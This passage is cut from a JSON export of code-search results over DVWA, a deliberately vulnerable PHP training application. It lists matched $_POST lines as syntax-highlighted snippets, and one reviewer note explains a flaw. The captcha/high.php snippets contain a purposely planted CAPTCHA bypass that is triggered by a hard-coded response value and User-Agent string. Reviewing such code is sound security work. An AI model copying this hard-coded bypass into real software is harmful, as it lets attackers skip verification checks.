punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 70,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 71,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 72,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span 
class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Default</span> values",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 91,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 92,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span 
class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 93,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span 
class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 94,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span 
class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 95,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token 
operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />The CAPTCHA was incorrect. Please try again.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 96,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token 
punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />The CAPTCHA was incorrect. Please try again.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\treturn<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
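  "note": "The failure branch on line 18 is skipped when the recaptcha_response_field POST value and the User-Agent header both equal hard-coded strings, so request data the client controls can satisfy the CAPTCHA check without a valid response; the decision should rest only on the is_valid result returned by recaptcha_check_answer."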
 },
 {
  "id": 102,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 